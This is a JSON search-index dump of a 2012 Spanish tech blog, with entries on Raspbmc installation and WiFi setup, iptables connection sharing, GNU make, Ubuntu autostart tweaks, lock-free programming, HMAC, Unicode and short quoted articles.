licenses.\u003c/p\u003e\n\u003cp\u003eLET THEM TAKE IT EASY\nDo you have people using your software? We all hate reading software\nlicenses. Let them take it easy and link them to your license on here.\nWe provide embed and linking options for every license on the site.\nNext time include a link alongside your license.\nTL;DR - Link a summary in place of a license.\u003c/p\u003e","title":"tl;drLegal"},{"content":" Primeros pasos con Ubuntu 12.04 es una guía para principiantes del sistema operativo Ubuntu. Se encuentra disponible bajo una licencia de código abierto y su descarga, lectura, modificación y distribución son libres. El manual le ayudará a familiarizarse con tareas cotidianas como navegar por Internet, escuchar música, escanear documentos y mucho más. Al centrarse en instrucciones fáciles de seguir, es adecuado para todos los niveles de experiencia.\n» ubuntu-manual.org\n","permalink":"http://karpoke.ignaciocano.com/2012/07/04/ubuntu-manual-project/","summary":"\u003cblockquote\u003e\n\u003cp\u003ePrimeros pasos con Ubuntu 12.04 es una guía para principiantes del\nsistema operativo Ubuntu. Se encuentra disponible bajo una licencia de\ncódigo abierto y su descarga, lectura, modificación y distribución son\nlibres.\nEl manual le ayudará a familiarizarse con tareas cotidianas como\nnavegar por Internet, escuchar música, escanear documentos y mucho\nmás. Al centrarse en instrucciones fáciles de seguir, es adecuado para\ntodos los niveles de experiencia.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://ubuntu-manual.org/\"\u003eubuntu-manual.org\u003c/a\u003e\u003c/p\u003e","title":"Ubuntu Manual Project"},{"content":"El otro día me quedé sin poder probar la conexión inalámbrica en Raspbmc porque los puertos USB de la Raspberry Pi no dan suficiente potencia para la antena WiFi USB que tengo. Cada puerto USB proporciona hasta 100mA, y parece que el consumo de la antena oscila entre 150mA y 200mA, por lo que no es suficiente. Quizá conectando un cable USB en Y desde los dos USB podría llegar a funcionar, pero nos quedaríamos sin puertos USB libres.\nUna solución que funciona es utilizar un concentrador (o hub) USB con alimentación externa. Además, podemos conectar la alimentación de la Raspberry Pi al concentrador, por lo que no necesitaremos dos enchufes.\nConfigurar una conexión inalámbrica en Raspbmc con una antena WiFi USB es parecido a lo que hay que hacer para configurarla en debian, pero como Raspbmc utiliza Network Manager, la configuraremos a través de éste.\nLa antena que tengo es una Conceptronic CT-WN4320Z con chip ZD1211 y que funciona con el controlador ZyDAS. Dado que el firmware para este chip no es libre, deberemos habilitar los repositorios non-free editando el fichero /etc/apt/sources.list:\ndeb http://ftp.debian.org/debian stable main non-free deb http://ftp.debian.org/debian/ squeeze-updates main non-free deb http://security.debian.org/ squeeze/updates main non-free Actualizamos los repositorios:\n$ sudo aptitude update Instalamos el controlador zd1211-firmware:\n$ sudo aptitude install zd1211-firmware Los siguientes paquetes puede que no sean estrictamente necesarios, pero si queremos ejecutar comandos como lsusb, iwconfig, iwlist, wpa_supplicant, etc. los vamos a necesitar. El paquete wpasupplicant lo he instalado porque he estado probando la conexión antes de hacerlo a través de Network Manager. Para instalarlos:\n$ sudo aptitude install usbutils wireless-tools wpasupplicant Vamos al directorio /etc/NetworkManager/system-connections, o lo creamos si no existía, y creamos el fichero wlan0:\n[connection] id=wlan0 uuid=11111111-1111-1111-1111-111111111111 type=802-11-wireless autoconnect=true timestamp=0 [802-11-wireless] ssid=77;89;83;83;73;68; mode=infrastructure security=802-11-wireless-security [802-11-wireless-security] key-mgmt=wpa-psk psk=very long long password [ipv4] method=manual dns=208.67.222.222;208.67.220.220; addresses1=192.168.50.2;24;192.168.50.1; [ipv6] method=ignore El fichero es bastante explicativo. De esta manera se configura una conexión con cifrado WPA2 e IP fija. A destacar:\nEl identificador de la conexión id no tiene por qué ser el nombre de la interfaz, pero así es fácil identificarla. El uuid debe ser único para todas las conexiones. El SSID debe convertirse al valor decimal de los caracteres en ASCII separados por punto y coma. Por ejemplo, si el SSID es MYSSID, podemos ejecutar `python -c \u0026#34;print \u0026#39;;\u0026#39;.join(str(ord(c)) for c in \u0026#39;MYSSID\u0026#39;)+\u0026#39;;\u0026#39;\u0026#34;` lo que nos devuelve `77;89;83;83;73;68;`. El punto y coma del final es importante. La frase de paso, que se especifica en psk, no es necesario ponerla entre comillas aunque contenga espacios. Los DNS son los de OpenDNS. La dirección IP asignada es 192.168.50.2, la máscara de red 24, es decir, `255.255.255.0` y la puerta de enlace `192.168.50.1`. Si en lugar de IP fija queremos usar DHCP, sustituimos la sección [ipv4] por:\n[ipv4] method=auto dhcp-client-id=xbmc dhcp-hostname=xbmc Una vez que hemos terminado de editar el fichero, le cambiamos los permisos:\n$ sudo chmod 600 /etc/NetworkManager/system-connections/wlan0 Esto es importante, porque si el fichero no tiene las restricciones de usuario y permisos, Network Manager lo ignorará.\nMediante el siguiente comando levantamos la conexión:\n$ nmcli con up id wlan0 Eso, o reiniciamos la Raspberry Pi.\nComo curiosidad, podemos consultar el UUID de las conexiones activas ejecutando:\n$ nmcli con status NAME UUID DEVICES SCOPE DEFAULT VPN wlan0 11111111-1111-1111-1111-111111111111 wlan0 system yes no O listar todas las conexiones con:\n$ nmcli con list NAME UUID TYPE SCOPE TIMESTAMP-REAL wlan0 11111111-1111-1111-1111-111111111111 802-11-wireless system Tue Jul 2 21:08:07 2012 Auto eth0 9ab5123b-s912-5215-cad2-b98fe521592d 802-3-ethernet system Mon Jul 2 20:48:03 2012 NAME UUID TYPE SCOPE TIMESTAMP-REAL Referencias » Configuring a NetworkManager Wireless Connection without Graphics\n","permalink":"http://karpoke.ignaciocano.com/2012/07/03/conexion-inalambrica-en-raspbmc/","summary":"\u003cp\u003e\u003ca href=\"/2012/06/29/raspbmc/\"\u003eEl otro día\u003c/a\u003e me quedé sin poder probar la conexión inalámbrica en\nRaspbmc porque los puertos USB de la Raspberry Pi no dan suficiente\npotencia para la antena WiFi USB que tengo. Cada puerto USB proporciona\nhasta 100mA, y parece que \u003ca href=\"https://help.ubuntu.com/community/WifiDocs/Driver/zydas_zd1211\"\u003eel consumo de la antena\u003c/a\u003e oscila entre 150mA\ny 200mA, por lo que no es suficiente. Quizá conectando un cable USB en Y\ndesde los dos USB podría llegar a funcionar, pero nos quedaríamos sin\npuertos USB libres.\u003c/p\u003e","title":"Conexión inalámbrica en Raspbmc"},{"content":" El pasado día 26 de junio asistí al evento ”Iniciativas Open Data en España”, atraído sin duda, por los grandes espadas en la materia que son Alberto Abella, Roberto Santos y Victoria Anderica, que además del reconocido prestigio que tienen, llevan años trabajando para que este país sea algo mejor. Como cabía esperar, no me defraudaron en sus intervenciones, que fueron tan correctas como acertadas. Como contrapartida, y diré el pecado, pero no el pecador, tuve que oír de boca de ”expertos” en la materia, estas dos afirmaciones, que me preocuparon y mucho, puesto que pueden afectar muy negativamente a la Ley de Transparencia y su desarrollo posterior:\n​a) Si licenciamos los datos públicos con licencias libres, tenemos el problema de las empresas no pueden hacer negocio con ellos.\n​b) No se pueden liberar los fondos no sujetos a derechos de autor de bibliotecas y de pinacotecas ya que son entidades culturales y las administraciones públicas tienen que poder cobrar por los datos.\n» Fernando Acero | fernando-acero.livejournal.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/01/una-cebolla-que-nos-puede-hacer-llorar/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl pasado día 26 de junio asistí al evento ”Iniciativas Open Data en\nEspaña”, atraído sin duda, por los grandes espadas en la materia que\nson Alberto Abella, Roberto Santos y Victoria Anderica, que además del\nreconocido prestigio que tienen, llevan años trabajando para que este\npaís sea algo mejor. Como cabía esperar, no me defraudaron en sus\nintervenciones, que fueron tan correctas como acertadas. Como\ncontrapartida, y diré el pecado, pero no el pecador, tuve que oír de\nboca de ”expertos” en la materia, estas dos afirmaciones, que me\npreocuparon y mucho, puesto que pueden afectar muy negativamente a la\nLey de Transparencia y su desarrollo posterior:\u003c/p\u003e","title":"Una cebolla que nos puede hacer llorar"},{"content":" Although the Enigma cipher as a whole is quite complex (it’s complexity is comparable to modern cryptographic algorithms) the individual transformations within it are relatively simple. In fact, they are simple enough that you can decipher an Enigma message with just a paper model. Our model is three-dimensional, to illustrate the wiring of a real Enigma machine. It needs only common household items to construct, and is completely compatible with all settings of a real Enigma machine (models I, M1, M2 and M3).\n» franklinheath.co.uk\n","permalink":"http://karpoke.ignaciocano.com/2012/07/01/paper-enigma/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAlthough the Enigma cipher as a whole is quite complex (it’s\ncomplexity is comparable to modern cryptographic algorithms) the\nindividual transformations within it are relatively simple. In fact,\nthey are simple enough that you can decipher an Enigma message with\njust a paper model.\nOur model is three-dimensional, to illustrate the wiring of a real\nEnigma machine. It needs only common household items to construct, and\nis completely compatible with all settings of a real Enigma machine\n(models I, M1, M2 and M3).\u003c/p\u003e","title":"Paper Enigma"},{"content":"Raspbmc es una distribución basada en debian que permite ejecutar XBMC en la Raspberry Pi, lo que la transforma en un interesante reproductor multimedia casero (HTPC).\nEsta distribución recibe actualizaciones constantes que añaden mejoras, actualizaciones de drivers y nuevas funcionalidades. Además, permite compartir el contenido multimedia a través de NFS, SMB, FTP y HTTP. Raspbmc ha sido creada y está siendo mantenida por Sam Nazarko.\nFuente retrocomputers.eu\nInstalación La instalación es muy sencilla, ya que existe un script que nos simplifica el proceso. Lo descargamos:\n$ wget http://svn.stmlabs.com/svn/raspbmc/testing/installers/python/install.py Introducimos la tarjeta SD y nos aseguramos de que esté desmontada antes de lanzar el script. Deberemos saber el nombre de dispositivo que tiene la tarjeta SD, en este caso /dev/mmcblk0:\n$ sudo python install-raspbmc.py Raspbmc installer for Linux and Mac OS X http://raspbmc.com ---------------------------------------- Please ensure you\u0026#39;ve inserted your SD card, and press Enter to continue. Enter the \u0026#39;Disk\u0026#39; you would like imaged, from the following list: Enter your choice here (e.g. \u0026#39;mmcblk0\u0026#39; or \u0026#39;sdd\u0026#39;): mmcblk0 It is your own responsibility to ensure there is no data loss! Please backup your system before imaging Are you sure you want to install Raspbmc to \u0026#39;/dev/mmcblk0\u0026#39;? [y/N] y Downloading, please be patient... Downloaded 49.52 of 49.52 MiB (100.00%) Please wait while Raspbmc is installed to your SD card... (This may take some time and no progress will be reported until it has finished.) 0+5852 registros leídos 0+5852 registros escritos 198000640 bytes (198 MB) copiados, 21,7791 s, 9,1 MB/s Installation complete. Finalising SD card, please wait... Raspbmc is now ready to finish setup on your Pi, please insert the SD card with an active internet connection Tras insertar la tarjeta SD en la Raspberry Pi y reiniciar, continuará la instalación y configuración del sistema. En particular, no tendremos que preocuparnos de modificar las particiones para aprovechar al máximo el espacio de la tarjeta SD, ya que lo hace de forma automática. Es necesario que la Raspberry Pi esté conectada a Internet. Una vez que termine, reiniciará y aparecerá la interfaz de XBMC. La descarga e instalación puede tardar un rato, entre 15 y 20 minutos. Esto lo comento especialmente por si hay alguien que el primer arranque lo realiza sin que la RPi esté conectada a ninguna pantalla, para que no desespere hasta que por fin pueda conectarse por ssh.\nAdemás, ya está preparada y configurada para que accedamos por SSH y FTP. El usuario el pi y la contraseña raspberry, aunque quizá esta es una de las primeras cosas que debamos cambiar nada más terminar la instalación.\nConexión a través de otro equipo Ya que parece que la antena WIFI USB no funciona si no es con hub USB con alimentación, y ahora mismo no tengo uno a mano, y la conexión directa por cable al router no es posible (desde donde pensaba colocar la Raspberry Pi), he probado otra posibilidad, y es conectarla por cable a un portátil que hará de intermediario y me permitirá conectarme a y tener conexión en la Raspberry Pi.\nEn el portátil, en este caso con Ubuntu Precise Pangolin 12.04, vamos a Configuración de Red \u0026gt; Cableada \u0026gt; Opciones (será accesible cuando conectemos el cable a la Raspberry Pi estando encendida) \u0026gt; Ajustes de IPv4:\nseleccionamos \u0026ldquo;Compartida con otros equipos\u0026rdquo; marcamos \u0026ldquo;Requiere dirección IPv4 para que esta conexión se complete\u0026#34; Esto nos asigna por defecto la dirección IP 10.42.0.1, máscara 255.255.255.0 y ruta predeterminada 0.0.0.0. Parece que no es configurable.\nDebemos prestar atención al cortafuegos, y permitir la compartición de la conexión. Por ejemplo, con Firestarter, vamos a Cortafuegos \u0026gt; Ejecutar asistente:\nDispositivo(s) detectado(s): seleccionamos \u0026ldquo;Dipositivo inalámbrico (wlan1)\u0026#34; Marcamos \u0026ldquo;Activar la compartición de la conexión a Internet\u0026rdquo; Dispositivo de red de área local: seleccionamos \u0026ldquo;Dispositivo ethernet (eth0)\u0026#34; También podemos hacerlo a mano con iptables. Si estamos seguros de que no utilizamos ninguna otra regla en la NAT, la podemos limpiar:\n$ sudo iptables -F -t nat Ahora deberemos crear una regla para indicar la otra interfaz que hará de puente, en este caso wlan1:\n$ sudo iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE Y por último, activamos la redirección IP:\n$ sudo sh -c \u0026#34;echo 1 \u0026gt; /proc/sys/net/ipv4/ip_forward\u0026#34; Si optamos por el método manual, y queremos que se ejecute cada vez que arranca el portátil (algo que puede no ser necesario), añadimos al final del fichero /etc/rc.local:\niptables -F -t nat iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE echo 1 \u0026gt; /proc/sys/net/ipv4/ip_forward Con esto el portátil ya está configurado, ahora sólo queda configurar la Rasperry Pi para que tenga IP estática de la misma red que tenemos en la interfaz del portátil. Vamos a Programs \u0026gt; Raspbmc Settings \u0026gt; Wired Network:\nIP address: 10.42.0.50 Netmask: 255.255.255.0 Gateway: 10.42.0.1 (la IP del portátil) DNS Server: 208.67.222.222 Search domain: local Esta es una solución temporal y tiene sus inconvenientes, ya que necesitamos conectar otro equipo por cable a la Raspberry Pi para conectarnos \u0026ldquo;remotamente\u0026rdquo; por SSH, ya sea para llevar a cabo actualizaciones, instalar programas, instalar complementos o copiar archivos multimedia. Además, mientras no esté conectada al portátil no podremos hacer uso de los complementos que necesitan acceso a Internet y con este método tampoco podremos utilizar la aplicación para Android para controlar XBMC.\n","permalink":"http://karpoke.ignaciocano.com/2012/06/29/raspbmc/","summary":"\u003cp\u003e\u003ca href=\"http://www.raspbmc.com/\"\u003eRaspbmc\u003c/a\u003e es una distribución basada en debian que permite ejecutar\nXBMC en la Raspberry Pi, lo que la transforma en un interesante\nreproductor multimedia casero (HTPC).\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Raspbmc logo\" loading=\"lazy\" src=\"/images/raspbmc-logo.png\"\u003e\u003c/p\u003e\n\u003cp\u003eEsta distribución recibe actualizaciones constantes que añaden mejoras,\nactualizaciones de \u003cem\u003edrivers\u003c/em\u003e y nuevas funcionalidades. Además, permite\ncompartir el contenido multimedia a través de NFS, SMB, FTP y HTTP.\nRaspbmc ha sido creada y está siendo mantenida por Sam Nazarko.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Raspbmc XBMC\" loading=\"lazy\" src=\"/images/raspbmc-xbmc-300x196.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eFuente \u003ca href=\"http://www.retrocomputers.eu/2012/06/20/watching-micro-men-via-xbmc-on-the-raspberry-pi/\"\u003eretrocomputers.eu\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e","title":"Raspbmc"},{"content":" Large projects can contain thousands of lines of code, distributed in multiple source files, written by many developers and arranged in several subdirectories. A project may contain several component divisions. These components may have complex inter-dependencies ” for example, in order to compile component X, you have to first compile Y; in order to compile Y, you have to first compile Z; and so on. For a large project, when a few changes are made to the source, manually recompiling the entire project each time is tedious, error-prone and time-consuming.\nMake is a solution to these problems. It can be used to specify dependencies between components, so that it will compile components in the order required to satisfy dependencies. An important feature is that when a project is recompiled after a few changes, it will recompile only the files which are changed, and any components that are dependent on it. This saves a lot of time. Make is, therefore, an essential tool for a large software project.\nEach project needs a Makefile ” a script that describes the project structure, namely, the source code files, the dependencies between them, compiler arguments, and how to produce the target output (normally, one or more executables). Whenever the make command is executed, the Makefile in the current working directory is interpreted, and the instructions executed to produce the target outputs. The Makefile contains a collection of rules, macros, variable assignments, etc. (’Makefile’ or ’makefile’ are both acceptable.)\n» Sarath Lakshman | linuxforu.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/28/gnu-make-in-detail-for-beginners/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLarge projects can contain thousands of lines of code, distributed in\nmultiple source files, written by many developers and arranged in\nseveral subdirectories. A project may contain several component\ndivisions. These components may have complex inter-dependencies ” for\nexample, in order to compile component X, you have to first compile Y;\nin order to compile Y, you have to first compile Z; and so on. For a\nlarge project, when a few changes are made to the source, manually\nrecompiling the entire project each time is tedious, error-prone and\ntime-consuming.\u003c/p\u003e","title":"GNU Make in Detail for Beginners"},{"content":"Las aplicaciones que se ejecutan al inicio tienen un archivo de configuración en el directorio /etc/xdg/autostart. Algunos de estos archivos de configuración tienen la variable NoDisplay=true, por lo que no aparecen en el listado de Aplicaciones al inicio, y por tanto no se pueden desactivar a golpe de ratón.\nSi queremos que estas aplicaciones se muestren y así poder desactivarlas mediante la interfaz gráfica, ejecutamos:\n$ sudo sed -i \u0026#39;s/NoDisplay=true/NoDisplay=false/\u0026#39; /etc/xdg/autostart/* Si además queremos que cada vez que instalamos un programa se ejecute este comando, podemos incluirlo en el archivo /etc/apt.conf:\nsed -i \u0026#39;s/NoDisplay=true/NoDisplay=false/\u0026#39; /etc/xdg/autostart/* Referencias » Tip: Como ver las aplicaciones que se ejecutan al inicio en Ubuntu\n","permalink":"http://karpoke.ignaciocano.com/2012/06/28/mostrar-las-aplicaciones-ocultas-que-se-ejecutan-al-inicio/","summary":"\u003cp\u003eLas aplicaciones que se ejecutan al inicio tienen un archivo de\nconfiguración en el directorio \u003ccode\u003e/etc/xdg/autostart\u003c/code\u003e. Algunos de estos\narchivos de configuración tienen la variable \u003ccode\u003eNoDisplay=true\u003c/code\u003e, por lo\nque no aparecen en el listado de Aplicaciones al inicio, y por tanto no\nse pueden desactivar a golpe de ratón.\u003c/p\u003e\n\u003cp\u003eSi queremos que \u003ca href=\"http://linuxzone.es/2012/06/07/tip-como-ver-las-aplicaciones-que-se-ejecutan-al-inicio-en-ubuntu/\"\u003eestas aplicaciones se muestren\u003c/a\u003e y así poder\ndesactivarlas mediante la interfaz gráfica, ejecutamos:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo sed -i \u0026#39;s/NoDisplay=true/NoDisplay=false/\u0026#39; /etc/xdg/autostart/*\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eSi además queremos que \u003ca href=\"http://linuxzone.es/2012/06/07/tip-como-ver-las-aplicaciones-que-se-ejecutan-al-inicio-en-ubuntu/#comment-23800\"\u003ecada vez que instalamos un programa se ejecute\neste comando\u003c/a\u003e, podemos incluirlo en el archivo \u003ccode\u003e/etc/apt.conf\u003c/code\u003e:\u003c/p\u003e","title":"Mostrar las aplicaciones ocultas que se ejecutan al inicio"},{"content":" El algoritmo de Dios es un término que surgió en la búsqueda de aquel algoritmo que indicara los pasos mínimos que resuelven un cubo de Rubik cualquiera. El término se usa profusamente, no sólo para el cubo de Rubik.\nMucho antes de conocer dicho término, cuando me encontraba con diversos tipos de problemas, ya me asaltaba recurrentemente una pregunta irrelevante (para el caso que me ocupaba), pero que espero te haga pensar un poco en la importancia de algunas cuestiones que quizás no conoces:\n”¿Qué solución daría Dios si fuera él quien resolviera el problema?”\nLo más sorprendente quizás, es que ”las soluciones de Dios” no sólo no están vedadas al intelecto humano, sino que son numerosas y prolíficas. Veamosló.\n» josejuan | genbetadev.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/28/el-algoritmo-de-dios/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl algoritmo de Dios es un término que surgió en la búsqueda de aquel\nalgoritmo que indicara los pasos mínimos que resuelven un cubo de\nRubik cualquiera. El término se usa profusamente, no sólo para el cubo\nde Rubik.\u003c/p\u003e\n\u003cp\u003eMucho antes de conocer dicho término, cuando me encontraba con\ndiversos tipos de problemas, ya me asaltaba recurrentemente una\npregunta irrelevante (para el caso que me ocupaba), pero que espero te\nhaga pensar un poco en la importancia de algunas cuestiones que quizás\nno conoces:\u003c/p\u003e","title":"El algoritmo de Dios"},{"content":" Lock-free programming is a challenge, not just because of the complexity of the task itself, but because of how difficult it can be to penetrate the subject in the first place. I was fortunate in that my first introduction to lock-free (also known as lockless) programming was Bruce Dawson’s excellent and comprehensive white paper, Lockless Programming Considerations. And like many, I’ve had the occasion to put Bruce’s advice into practice developing and debugging lock-free code on platforms such as the Xbox 360. Since then, a lot of good material has been written, ranging from abstract theory and proofs of correctness to practical examples and hardware details. I’ll leave a list of references in the footnotes. At times, the information in one source may appear orthogonal to other sources: For instance, some material assumes sequential consistency, and thus sidesteps the memory ordering issues which typically plague lock-free C/C++ code. The new C++11 atomic library standard throws another wrench into the works, challenging the way many of us express lock-free algorithms. In this post, I’d like to re-introduce lock-free programming, first by defining it, then by distilling most of the information down to a few key concepts. I’ll show how those concepts relate to one another using flowcharts, then we’ll dip our toes into the details a little bit. At a minimum, any programmer who dives into lock-free programming should already understand how to write correct multithreaded code using mutexes, and other high-level synchronization objects such as semaphores and events.\n» preshing.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/27/an-introduction-to-lock-free-programming/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLock-free programming is a challenge, not just because of the\ncomplexity of the task itself, but because of how difficult it can be\nto penetrate the subject in the first place.\nI was fortunate in that my first introduction to lock-free (also\nknown as lockless) programming was Bruce Dawson’s excellent and\ncomprehensive white paper, Lockless Programming Considerations. And\nlike many, I’ve had the occasion to put Bruce’s advice into practice\ndeveloping and debugging lock-free code on platforms such as the Xbox\n360.\nSince then, a lot of good material has been written, ranging from\nabstract theory and proofs of correctness to practical examples and\nhardware details. I’ll leave a list of references in the footnotes. At\ntimes, the information in one source may appear orthogonal to other\nsources: For instance, some material assumes sequential consistency,\nand thus sidesteps the memory ordering issues which typically plague\nlock-free C/C++ code. The new C++11 atomic library standard throws\nanother wrench into the works, challenging the way many of us express\nlock-free algorithms.\nIn this post, I’d like to re-introduce lock-free programming, first\nby defining it, then by distilling most of the information down to a\nfew key concepts. I’ll show how those concepts relate to one another\nusing flowcharts, then we’ll dip our toes into the details a little\nbit. At a minimum, any programmer who dives into lock-free programming\nshould already understand how to write correct multithreaded code\nusing mutexes, and other high-level synchronization objects such as\nsemaphores and events.\u003c/p\u003e","title":"An Introduction to Lock-Free Programming"},{"content":" The general thrust of this post is: use a MAC function like HMAC to sign data, don’t use hash functions. Although not all hash functions suffer from the problem I’m going to illustrate, in general using a hash function for message authentication comes with a lot of potential problems because those functions aren’t designed for this task. You shouldn’t try to work around it by creatively processing the inputs or inventing some fancy way of chaining hash functions. Just use the functions that were designed for this task instead of inventing your own crypto schemes.\n» jcoglan.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/27/why-you-should-never-use-hash-functions-for-message-authentication/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe general thrust of this post is: use a MAC function like HMAC to\nsign data, don’t use hash functions. Although not all hash functions\nsuffer from the problem I’m going to illustrate, in general using a\nhash function for message authentication comes with a lot of potential\nproblems because those functions aren’t designed for this task. You\nshouldn’t try to work around it by creatively processing the inputs or\ninventing some fancy way of chaining hash functions. Just use the\nfunctions that were designed for this task instead of inventing your\nown crypto schemes.\u003c/p\u003e","title":"Why you should never use hash functions for message authentication"},{"content":" This is a story that dates back to the earliest days of computers. The story has a plot, well, sort of. It has competition and intrigue, as well as traversing oodles of countries and languages. There is conflict and resolution, and a happyish ending. But the main focus is the characters ” 110,116 of them. By the end of the story, they will all find their own unique place in this world. This story (or article, as known on Smashing Magazine) will follow a few of those characters more closely, as they journey from Web server to browser, and back again. Along the way, you’ll find out more about the history of characters, character sets, Unicode and UTF-8, and why question marks and odd accented characters sometimes show up in databases and text files.\n» Paul Tero | smashingmagazine.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/27/all-about-unicode-utf8-character-sets/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis is a story that dates back to the earliest days of computers. The\nstory has a plot, well, sort of. It has competition and intrigue, as\nwell as traversing oodles of countries and languages. There is\nconflict and resolution, and a happyish ending. But the main focus is\nthe characters ” 110,116 of them. By the end of the story, they will\nall find their own unique place in this world.\nThis story (or article, as known on Smashing Magazine) will follow a\nfew of those characters more closely, as they journey from Web server\nto browser, and back again. Along the way, you’ll find out more about\nthe history of characters, character sets, Unicode and UTF-8, and why\nquestion marks and odd accented characters sometimes show up in\ndatabases and text files.\u003c/p\u003e","title":"All About Unicode, UTF8 \u0026 Character Sets"},{"content":" Estimado Rafael Correa, Presidente de Ecuador\nEn lo referente al asilo de Julian Assange en Ecuador me permito hacerle la siguiente recomendación.\nEl trabajo realizado por Assange y WikiLeaks ha sido muy importante para transparentar el mundo en el que vivimos. Proteger a Julian Assange de la persecución de EE.UU. es un deber que tenemos todos y usted tiene la posibilidad de ayudarle. Las posibles acusaciones de delitos sexuales son otro asunto, y de ser serias, merecen respeto. Aquí propongo una manera por la cual Ecuador puede lograr los dos objetivos.\nHasta ahora, Suecia no tiene acusaciones formales contra Assange sino que los oficiales suecos piden plantearle preguntas, lo que Assange les ha invitado a hacer en Londres. Al darle asilo, Ecuador puede permitirse dar las facilidades de la embajada de Ecuador para que oficiales suecos lo puedan interrogar. Si luego\nSuecia lo acusa formalmente, podrá pedir su entrega normalmente, que se considerará según la ley ecuatoriana, y con una condición: que no lo rinda a ningún otro país, sino que lo deje salir para Ecuador, o al fin del proceso si sale inocente, o al fin de su pena si se condena. Sinceramente en el espíritu de ayudar, Richard Stallman\n» telegrafo.com.ec\n","permalink":"http://karpoke.ignaciocano.com/2012/06/26/carta-abierta-al-presidente-constitucional-de-la-republica-del-ecuador/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEstimado Rafael Correa,\nPresidente de Ecuador\u003c/p\u003e\n\u003cp\u003eEn lo referente al asilo de Julian Assange en Ecuador me permito\nhacerle la siguiente recomendación.\u003c/p\u003e\n\u003cp\u003eEl trabajo realizado por Assange y WikiLeaks ha sido muy importante\npara transparentar el mundo en el que vivimos. Proteger a Julian\nAssange de la persecución de EE.UU. es un deber que tenemos todos y\nusted tiene la posibilidad de ayudarle. Las posibles acusaciones de\ndelitos sexuales son otro asunto, y de ser serias, merecen respeto.\nAquí propongo una manera por la cual Ecuador puede lograr los dos\nobjetivos.\u003c/p\u003e","title":"Carta abierta al Presidente Constitucional de la República del Ecuador"},{"content":" Tras este novelesco título lo que se esconde en esta ocasión es una estructura que podemos encontrar últimamente en bibliotecas y códigos de terceros. Se trata de una variante de las funciones autoejecutables (o que se auto invocan) que ya tratamos aquí hace algún tiempo.\nEn concreto, se trata de la siguiente pieza de código:\n!function() { // My awesome code... }(); ¿Qué es exactamente esta función negada? ¿Cómo y porqué funciona? Echemos un vistazo a las tripas de Javascript¦\n» etnassoft.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/26/el-extrano-caso-de-la-funcion-negada-en-javascript/","summary":"\u003cblockquote\u003e\n\u003cp\u003eTras este novelesco título lo que se esconde en esta ocasión es una\nestructura que podemos encontrar últimamente en bibliotecas y códigos\nde terceros. Se trata de una variante de las funciones autoejecutables\n(o que se auto invocan) que ya tratamos aquí hace algún tiempo.\u003c/p\u003e\n\u003cp\u003eEn concreto, se trata de la siguiente pieza de código:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e!function() {\n    // My awesome code...\n}();\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e¿Qué es exactamente esta función negada? ¿Cómo y porqué funciona?\nEchemos un vistazo a las tripas de Javascript¦\u003c/p\u003e","title":"El extraño caso de la función negada en Javascript"},{"content":" El caso TheFlame ha promovido muchas reacciones: los articulistas rellenan páginas con prefijos ”ciber” y la palabra ”guerra”. Las casas antivirus lo usan como arma de venta (aun sin haberlo detectado en cinco años) y Microsoft queda en evidencia con su PKI y la refuerza. TheFlame ha minado también la confianza: en los gobiernos, en los antivirus\u0026hellip; pero sobre todo, en la criptografía y en la actualización automática.\n» hispasec.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/26/actualizacion-automatica-bendicion-o-condena/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl caso TheFlame ha promovido muchas reacciones: los articulistas\nrellenan páginas con prefijos ”ciber” y la palabra ”guerra”. Las casas\nantivirus lo usan como arma de venta (aun sin haberlo detectado en\ncinco años) y Microsoft queda en evidencia con su PKI y la refuerza.\nTheFlame ha minado también la confianza: en los gobiernos, en los\nantivirus\u0026hellip; pero sobre todo, en la criptografía y en la actualización\nautomática.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://unaaldia.hispasec.com/2012/06/actualizacion-automatica-bendicion-o.html\"\u003ehispasec.com\u003c/a\u003e\u003c/p\u003e","title":"Actualización automática ¿Bendición o condena?"},{"content":" In this article, I demonstrate:\ndifference between dynamic scoping and lexical scoping in Emacs Lisp what to watch out for with dynamic scoping what you can do with lexical scoping and lexical closures what happens when you mix lexical scoping code and dynamic scoping code Emacs Lisp is always dynamically scoped in Emacs 23 and below. Support for lexical scoping is added to Emacs 24. Nice because many agree that lexical scoping makes more sense in most cases than dynamic scoping does. You’ll see why soon in this article. If you have an el file that you want to load with lexical scoping, you can add -*- lexical-binding: t -*- as the first line, then when Emacs 24 loads the file, it will apply lexical scoping to the code in that el file.\n» yoo2080.wordpress.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/26/lexical-scoping-and-dynamic-scoping-in-emacs-lisp/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn this article, I demonstrate:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edifference between dynamic scoping and lexical scoping in Emacs\nLisp\u003c/li\u003e\n\u003cli\u003ewhat to watch out for with dynamic scoping\u003c/li\u003e\n\u003cli\u003ewhat you can do with lexical scoping and lexical 